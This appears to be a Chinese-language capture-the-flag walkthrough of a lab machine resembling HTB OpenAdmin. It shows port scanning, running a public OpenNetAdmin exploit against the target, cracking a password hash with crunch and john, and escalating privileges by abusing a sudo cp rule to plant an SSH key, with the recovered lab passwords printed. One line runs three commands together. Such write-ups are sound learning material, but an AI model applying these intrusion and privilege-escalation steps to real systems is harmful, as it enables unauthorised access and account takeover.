nmap -A -p- 扫描一下端口
访问一下,哎,这不是 openadmin 嘛(【HTB】OpenAdmin)
searchsploit opennetadmin
然后把搜出来的那个复制出来 searchsploit -m 47691
可能会有些问题,复制出来一份给他权限再执行就没问题了
./47691.sh http://192.168.149.169/ona/
find / -type f -user www-data
看一下,有哪些文件是 www-data 可以读的
得到
douglas:$apr1$9fgG/hiM$BtsL9qpNHUlylaLxk81qY1
保存为 hash.txt
同时提到是 10 位数的密码,所以
crunch 10 10 aefhrt > dict.txt
使用 john 爆破一下
john --wordlist=dict.txt hash.txt
douglas:fatherrrrr
尝试用 ssh 登录一下
sudo -l 看一下,发现可以不用密码来执行 jen 用户的 cp
我们来把密钥拷贝出来,待会使用 ssh 登录 jen 用户
ssh-keygen -t rsacp /home/douglas/.ssh/hack.pub /tmp/authorized_keyssudo -u jen /bin/cp /tmp/authorized_keys /home/jen/.ssh/
使用刚才生成的密钥登录
ssh jen@192.168.149.169 -i /home/douglas/.ssh/hack
看一下邮件,他告诉我们:
Moss's password is now Fire!Fire!
我们 su 切换账户 moss
发现一个 upyourgame,运行就可以啦
emmmm,好随意的啊
在 /root 目录下可以发现 flag